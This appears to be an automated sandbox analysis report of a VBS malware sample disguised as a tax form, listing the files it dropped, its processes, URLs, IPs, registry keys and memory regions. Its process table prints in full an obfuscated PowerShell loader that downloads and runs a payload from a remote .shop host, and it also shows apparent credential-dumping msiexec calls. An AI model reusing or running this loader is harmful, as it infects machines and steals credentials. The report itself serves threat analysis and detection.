Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Custom Export Tax Recovery Form.vbs
|
ASCII text, with very long lines (2077), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t235uqcr.shk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2rbwcxw.25x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upv5lvzg.hqh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr2maw1d.c0f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv8123.tmp
|
Extensible storage user DataBase, version 0x620, checksum 0x61552b59, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ncxgt
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Enspnderen.rep
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst
Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If
($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke;
for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function
Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43
'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex
.a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl
iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43
'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn
b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought
(Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA
T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43
'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile
U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red
');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De
:,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT
esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43
' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG
r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought
(Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC
uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf
.asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr
AnnNateBac,Fas$C lD uyi ins PupTellUd.aU syEn.kAntoC.rrRoktEle)Rov ';$Displaykort=$Medicine;Donought (Capulet43 'Fil$F ugFrmlRagO.dsBTelAs
yL Ea:dkko r sVanT emELi O iCFaroLarL MaLDysAKir= am(OmhTFeje CusLitTfor- arp BrAscotsynH In cac$Grad ReiUnbsAquP n lAbjAHegyTllkKonOJe
r AmtTat)Bil ');while (!$Osteocolla) {Donought (Capulet43 'but$LevgGlolPerocolbVeca yplIsc:TinfOverU.deskalGrasTabesrsr ErsRe
=,od$Wr tDumrKenu heeHyp ') ;Donought $Taarnfalkes;Donought (Capulet43 'GoysHusTBanAsivRTllt Pn-Mogs E LMetETe eBauPBo Reg4Ban
');Donought (Capulet43 ',am$Blig dil jaOKleBEmaareflP s:MetoPres Zot HaeMapOs nc UnoOutLFeuLRevaMns= Pl( .et OvEPacsLset nb-
jPUnpA.toTPaihMil Gro$A lD L iAans,ntP N,lserAYadyHypk .uO OrRMost.nb) pa ') ;Donought (Capulet43 's j$K.sGRgsL L.OTilBsltAUndLVrv:sennI.eEH
bIDisGUndHsilBUndoNatR miiskaNR ugElf2Ta 4 Fo1Lyk= de$ReggKugl DiOsp bTriaspgLOve: BuFgr,Is,iLErrL KuO.kow .ri F tArcEPhi+Pri+
Ad%Far$MaskAnaOT,gnVe s meOR,nLOffi NvDCy,eT drUnmiBasnAcyGMil.MalcA tOTrouBilNUp tHyp ') ;$Dolkhalerne=$Konsolidering[$Neighboring241];}$prefertilization=292042;$Wavenumber1=30384;Donought
(Capulet43 'f l$Du.g B,LPsyoundbOprAGenlErg:PolBG uiResp R LC,aOTras MeIAgrVBesEpre1 ,n6Bra5Bar Rea=I e .gogToleDi.tPre-Ko,cPutOT
eNDo tAsseRelN setDer suf$HrgDTrbiHyps T.PCapL BuA ,uyFagk skoTilR utNom ');Donought (Capulet43 ' Bi$ EkgDikl proUndbBl.a
Bulsma:satKM,nvNe aPhynskat T.iNontLsresp tDicsNiem rsUn.sR cihe,gMadeInt syg=sov Gra[U ss layOprsDiutOveeP ems u.HasC emomasnservTh
eRegr P tTv ]A b:Ter:,enFsamr ,nosammAutB MaaPe s re,or6Non4 bsskn.tUdkrPl iI pnTilgHan( G $ alBAdoiPropIrrlTraoHemsOutiCa
vAr,este1 Al6Ga.5Bes)Rej ');Donought (Capulet43 ' he$ CrGW.oLOv oRegbLy AKomLKry:BrusH lK LiA,ntfTasfA,leGenr ConCooE.ng Pat=Erk
la[ NosR kYsl s gat,npeTo mDe . reT G.EOsmxWintFul.abre ,iNC gCAlto Bad ejIHydNParGs i]Udb:Pan:sulAMotsDelC.veiKo,IMi . ArgInde
ChTTilsFr TXerR Eni anDevgDec(Mal$ arKJa v ataGelNCamt skIBebTplee saTN nsMicMAfks glsManIHomGPe esqu)U s ');Donought (Capulet43
'Ni.$TakgspyLR.yOMidB stA A lsup: TiRComEPl n.igdDi.ePo,s.eptKatePronshaEOmoNsal=I d$ MasLikkKonaE,af .aFBabe.etr Ggn HeEs.o.AktsR.euAfbB
es stT TorIntiB sNIroGA l(Pte$PecpL,gRthrE PrFAndeCalr.ulT alisgel WaI UvzuntA Wat.ariFraoBjeNDet, An$.irwV nA CoVBlaeB mnYa,UTrom,otBHaaEsupr
yn1Ant) om ');Donought $Rendestenen;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst
Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If
($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke;
for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function
Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43
'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex
.a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl
iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43
'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn
b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought
(Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA
T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43
'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile
U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red
');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De
:,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT
esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43
' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG
r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought
(Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC
uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf
.asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr
AnnNateBac,Fas$C lD uyi ins PupTellUd.aU syEn.kAntoC.rrRoktEle)Rov ';$Displaykort=$Medicine;Donought (Capulet43 'Fil$F ugFrmlRagO.dsBTelAs
yL Ea:dkko r sVanT emELi O iCFaroLarL MaLDysAKir= am(OmhTFeje CusLitTfor- arp BrAscotsynH In cac$Grad ReiUnbsAquP n lAbjAHegyTllkKonOJe
r AmtTat)Bil ');while (!$Osteocolla) {Donought (Capulet43 'but$LevgGlolPerocolbVeca yplIsc:TinfOverU.deskalGrasTabesrsr ErsRe
=,od$Wr tDumrKenu heeHyp ') ;Donought $Taarnfalkes;Donought (Capulet43 'GoysHusTBanAsivRTllt Pn-Mogs E LMetETe eBauPBo Reg4Ban
');Donought (Capulet43 ',am$Blig dil jaOKleBEmaareflP s:MetoPres Zot HaeMapOs nc UnoOutLFeuLRevaMns= Pl( .et OvEPacsLset nb-
jPUnpA.toTPaihMil Gro$A lD L iAans,ntP N,lserAYadyHypk .uO OrRMost.nb) pa ') ;Donought (Capulet43 's j$K.sGRgsL L.OTilBsltAUndLVrv:sennI.eEH
bIDisGUndHsilBUndoNatR miiskaNR ugElf2Ta 4 Fo1Lyk= de$ReggKugl DiOsp bTriaspgLOve: BuFgr,Is,iLErrL KuO.kow .ri F tArcEPhi+Pri+
Ad%Far$MaskAnaOT,gnVe s meOR,nLOffi NvDCy,eT drUnmiBasnAcyGMil.MalcA tOTrouBilNUp tHyp ') ;$Dolkhalerne=$Konsolidering[$Neighboring241];}$prefertilization=292042;$Wavenumber1=30384;Donought
(Capulet43 'f l$Du.g B,LPsyoundbOprAGenlErg:PolBG uiResp R LC,aOTras MeIAgrVBesEpre1 ,n6Bra5Bar Rea=I e .gogToleDi.tPre-Ko,cPutOT
eNDo tAsseRelN setDer suf$HrgDTrbiHyps T.PCapL BuA ,uyFagk skoTilR utNom ');Donought (Capulet43 ' Bi$ EkgDikl proUndbBl.a
Bulsma:satKM,nvNe aPhynskat T.iNontLsresp tDicsNiem rsUn.sR cihe,gMadeInt syg=sov Gra[U ss layOprsDiutOveeP ems u.HasC emomasnservTh
eRegr P tTv ]A b:Ter:,enFsamr ,nosammAutB MaaPe s re,or6Non4 bsskn.tUdkrPl iI pnTilgHan( G $ alBAdoiPropIrrlTraoHemsOutiCa
vAr,este1 Al6Ga.5Bes)Rej ');Donought (Capulet43 ' he$ CrGW.oLOv oRegbLy AKomLKry:BrusH lK LiA,ntfTasfA,leGenr ConCooE.ng Pat=Erk
la[ NosR kYsl s gat,npeTo mDe . reT G.EOsmxWintFul.abre ,iNC gCAlto Bad ejIHydNParGs i]Udb:Pan:sulAMotsDelC.veiKo,IMi . ArgInde
ChTTilsFr TXerR Eni anDevgDec(Mal$ arKJa v ataGelNCamt skIBebTplee saTN nsMicMAfks glsManIHomGPe esqu)U s ');Donought (Capulet43
'Ni.$TakgspyLR.yOMidB stA A lsup: TiRComEPl n.igdDi.ePo,s.eptKatePronshaEOmoNsal=I d$ MasLikkKonaE,af .aFBabe.etr Ggn HeEs.o.AktsR.euAfbB
es stT TorIntiB sNIroGA l(Pte$PecpL,gRthrE PrFAndeCalr.ulT alisgel WaI UvzuntA Wat.ariFraoBjeNDet, An$.irwV nA CoVBlaeB mnYa,UTrom,otBHaaEsupr
yn1Ant) om ');Donought $Rendestenen;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://ln6b9.shop/amykhRcM/Redobling.psdP
|
unknown
|
|
|
|
http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.bin
|
172.67.128.117
|
|
|
|
http://ln6b9.shop/amykhRcM/Redobling.psdXR
|
unknown
|
|
|
|
154.216.18.65
|
|
||
|
http://ln6b9.shop
|
unknown
|
|
|
|
http://ln6b9.shop/amykhRcM/Redobling.psd
|
172.67.128.117
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/json.gphy
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gps
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
ln6b9.shop
|
172.67.128.117
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.18.65
|
unknown
|
Seychelles
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
172.67.128.117
|
ln6b9.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-UXHRJ7
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-UXHRJ7
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-UXHRJ7
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7B8A000
|
heap
|
page read and write
|
|
|
|
1DB5A7CE000
|
trusted library allocation
|
page read and write
|
|
|
|
7BE1000
|
heap
|
page read and write
|
|
|
|
609A000
|
trusted library allocation
|
page read and write
|
|
|
|
AA58000
|
direct allocation
|
page execute and read and write
|
|
|
|
8E10000
|
direct allocation
|
page execute and read and write
|
|
|
|
7BCD000
|
heap
|
page read and write
|
|
|
|
1DB48AA0000
|
heap
|
page read and write
|
||
|
22329896000
|
heap
|
page read and write
|
||
|
238DC000
|
heap
|
page read and write
|
||
|
1DB62D79000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
B458000
|
direct allocation
|
page execute and read and write
|
||
|
223299D7000
|
heap
|
page read and write
|
||
|
1DB4A986000
|
trusted library allocation
|
page read and write
|
||
|
4D10000
|
trusted library allocation
|
page read and write
|
||
|
2B5927E000
|
stack
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
8C1C000
|
heap
|
page read and write
|
||
|
22329A1B000
|
heap
|
page read and write
|
||
|
4C1C000
|
heap
|
page read and write
|
||
|
4C3D000
|
heap
|
page read and write
|
||
|
223299DD000
|
heap
|
page read and write
|
||
|
44DE000
|
heap
|
page read and write
|
||
|
22327A82000
|
heap
|
page read and write
|
||
|
223299CE000
|
heap
|
page read and write
|
||
|
1DB48AAC000
|
heap
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
4579000
|
heap
|
page read and write
|
||
|
93C42FE000
|
stack
|
page read and write
|
||
|
6788000
|
remote allocation
|
page execute and read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7E70000
|
direct allocation
|
page read and write
|
||
|
2F2E000
|
stack
|
page read and write
|
||
|
22327B42000
|
heap
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
7C08000
|
heap
|
page read and write
|
||
|
22329AE0000
|
heap
|
page read and write
|
||
|
22327B42000
|
heap
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
|
223299B9000
|
heap
|
page read and write
|
||
|
7BAF000
|
stack
|
page read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
299C000
|
stack
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
23ABC000
|
unclassified section
|
page execute and read and write
|
||
|
8E00000
|
trusted library allocation
|
page read and write
|
||
|
22327B1D000
|
heap
|
page read and write
|
||
|
7EF0000
|
heap
|
page read and write
|
||
|
22329A2A000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
|
4C0C000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
22327AE3000
|
heap
|
page read and write
|
||
|
22329A1B000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page readonly
|
||
|
23832000
|
heap
|
page read and write
|
||
|
7926000
|
heap
|
page read and write
|
||
|
4C1C000
|
heap
|
page read and write
|
||
|
5388000
|
remote allocation
|
page execute and read and write
|
||
|
223298A4000
|
heap
|
page read and write
|
||
|
22327AEE000
|
heap
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
|
22327AEE000
|
heap
|
page read and write
|
||
|
33AB000
|
heap
|
page read and write
|
||
|
28ED000
|
stack
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
1DB62DD5000
|
heap
|
page read and write
|
||
|
7C08000
|
heap
|
page read and write
|
||
|
4C38000
|
heap
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
7FFD345E1000
|
trusted library allocation
|
page read and write
|
||
|
23740000
|
heap
|
page read and write
|
||
|
4C1C000
|
heap
|
page read and write
|
||
|
313E000
|
unkown
|
page read and write
|
||
|
1DB4A565000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
2339D000
|
stack
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
44B6000
|
heap
|
page read and write
|
||
|
22329A2A000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page readonly
|
||
|
1DB62CF0000
|
heap
|
page execute and read and write
|
||
|
44A0000
|
heap
|
page read and write
|
||
|
8B7D000
|
stack
|
page read and write
|
||
|
22327B42000
|
heap
|
page read and write
|
||
|
234EE000
|
stack
|
page read and write
|
||
|
22327B42000
|
heap
|
page read and write
|
||
|
22329B0E000
|
heap
|
page read and write
|
||
|
7FFD34612000
|
trusted library allocation
|
page read and write
|
||
|
A058000
|
direct allocation
|
page execute and read and write
|
||
|
354B000
|
heap
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
1DB62AA8000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
4C1C000
|
heap
|
page read and write
|
||
|
2B59079000
|
stack
|
page read and write
|
||
|
22327A50000
|
heap
|
page read and write
|
||
|
8A05000
|
trusted library allocation
|
page read and write
|
||
|
793F000
|
heap
|
page read and write
|
||
|
8C61000
|
heap
|
page read and write
|
||
|
7C13000
|
heap
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
22329A0F000
|
heap
|
page read and write
|
||
|
93C40F9000
|
stack
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
22329AAD000
|
heap
|
page read and write
|
||
|
5EF1000
|
trusted library allocation
|
page read and write
|
||
|
1DB48B02000
|
heap
|
page read and write
|
||
|
23591000
|
direct allocation
|
page execute and read and write
|
||
|
22327B3C000
|
heap
|
page read and write
|
||
|
23833000
|
heap
|
page read and write
|
||
|
4D2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
73CE000
|
stack
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page read and write
|
||
|
223299DA000
|
heap
|
page read and write
|
||
|
1DB4A490000
|
trusted library allocation
|
page read and write
|
||
|
22329AD4000
|
heap
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
4BFF000
|
stack
|
page read and write
|
||
|
7F10000
|
heap
|
page read and write
|
||
|
22329A30000
|
heap
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
2B59FCB000
|
stack
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
74E0000
|
direct allocation
|
page read and write
|
||
|
22327910000
|
heap
|
page read and write
|
||
|
223299EF000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
7FFD344F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
223299BD000
|
heap
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
4988000
|
remote allocation
|
